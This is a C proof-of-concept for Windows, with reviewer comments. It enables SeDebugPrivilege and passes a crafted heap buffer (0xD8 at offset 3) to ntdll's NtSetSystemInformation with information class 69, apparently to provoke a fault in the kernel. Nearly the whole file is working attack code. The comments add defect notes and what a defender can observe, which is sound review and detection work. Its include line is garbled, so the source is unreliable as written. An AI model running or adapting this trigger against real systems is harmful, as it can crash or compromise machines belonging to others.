/*
 * Proof-of-concept that hands a caller-controlled heap buffer to
 * ntdll!NtSetSystemInformation (information class 69) and prints the
 * status it returns.  The code is left as found; the comments record
 * the defects a reviewer would raise and what a defender can observe.
 *
 * NOTE(review): the header names were lost in extraction (the line reads
 * "#include #include"); from the APIs used they are presumably
 * <windows.h> and <stdio.h> -- confirm against the original file.
 */
#include #include

/* NOTE(review): the SDK's NTSTATUS is a signed LONG.  Declaring it as
 * ULONG makes failure codes (high bit set) print as large unsigned values;
 * harmless for "%08X" below, but the sign is lost for any later test. */
typedef ULONG NTSTATUS;

/* Prototype of NtSetSystemInformation(Class, Buffer, Length).
 * NOTE(review): no return type is written before "(NTAPI *...)", so this
 * relies on implicit int; C99 and later require an explicit return type. */
typedef (NTAPI *LPNTSETSYSTEMINFORMATION) (IN DWORD, IN PVOID, IN ULONG);

#define LENGTH_MEM 400 // must be between 40 and 4136 bytes

/*
 * Enable or disable one named privilege on the current process token.
 *
 * lpPrivilegeName: narrow privilege name, e.g. "SeDebugPrivilege".
 * bEnable:         TRUE sets SE_PRIVILEGE_ENABLED, FALSE clears the attribute.
 * Returns the result of AdjustTokenPrivileges, or FALSE when the privilege
 * name cannot be looked up.
 */
BOOL WINAPI EnablePrivilege(LPCSTR lpPrivilegeName, BOOL bEnable)
{
    TOKEN_PRIVILEGES Privileges;
    HANDLE hToken;
    BOOL bResult;

    /* NOTE(review): the return value is not checked; if this fails hToken
     * is uninitialised and is still passed to AdjustTokenPrivileges and
     * CloseHandle below. */
    OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken);

    Privileges.PrivilegeCount = 1;
    Privileges.Privileges[0].Attributes = (bEnable) ? SE_PRIVILEGE_ENABLED : 0;

    /* NOTE(review): lpPrivilegeName is a narrow (char) string but is cast
     * to LPCWSTR and handed to the wide-character lookup, which then reads
     * the bytes as UTF-16.  The types do not match, so the lookup is
     * expected to fail and this function to return FALSE -- and the only
     * caller ignores that return value. */
    if (!LookupPrivilegeValueW(NULL, (LPCWSTR)lpPrivilegeName, &Privileges.Privileges[0].Luid)) {
        CloseHandle(hToken);
        return FALSE;
    }

    /* NOTE(review): a TRUE result only means the call was accepted.  If the
     * token does not hold the privilege the call still returns TRUE and
     * GetLastError() reports ERROR_NOT_ALL_ASSIGNED, which is not checked. */
    bResult = AdjustTokenPrivileges(hToken, FALSE, &Privileges, 0, NULL, NULL);
    CloseHandle(hToken);
    return bResult;
}

/*
 * Entry point: attempt to enable SeDebugPrivilege, resolve
 * NtSetSystemInformation from ntdll, and issue one call with a
 * LENGTH_MEM-byte zeroed buffer whose byte at offset 3 is 0xD8.
 *
 * From a defender's side the observable sequence is: a user-mode process
 * adjusting its own token for SeDebugPrivilege, resolving a native API by
 * name from ntdll, calling NtSetSystemInformation with information class
 * 69 and a heap buffer, then blocking on stdin.
 *
 * Returns 1 if the export cannot be resolved, 0 otherwise.
 */
int main()
{
    LPNTSETSYSTEMINFORMATION fNtSetSystemInformation;
    char* mem;
    NTSTATUS Status;
    char* sdn="SeDebugPrivilege";

    /* Return value ignored: execution continues whether or not the
     * privilege was actually enabled. */
    EnablePrivilege(sdn, TRUE);

    /* Resolve the native API at run time rather than linking against ntdll. */
    fNtSetSystemInformation = (LPNTSETSYSTEMINFORMATION) GetProcAddress(
        GetModuleHandleA("ntdll.dll"), "NtSetSystemInformation");
    if ( fNtSetSystemInformation == NULL ) {
        fprintf(stderr, "Cannot find ntdll!NtSetSystemInformation\n");
        return 1;
    }

    /* NOTE(review): HeapAlloc can return NULL; the result is written to
     * without a check.  The buffer is never freed -- the process exits soon
     * after, so this is a hygiene issue rather than a leak that matters. */
    mem = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, LENGTH_MEM);

    /* 0xD8 does not fit a signed char; the stored value is
     * implementation-defined (typically -40 where char is signed), though
     * the byte pattern in memory is 0xD8 either way. */
    mem[3] = 0xD8;

    /* 69 is the SystemInformationClass argument; its meaning is not
     * stated on this page. */
    Status = fNtSetSystemInformation(69, mem, LENGTH_MEM);

    printf("Status = %08X\n", Status );

    /* Wait for input before exiting -- presumably so the printed status
     * stays visible when run from a console. */
    getc(stdin);
    return 0;
}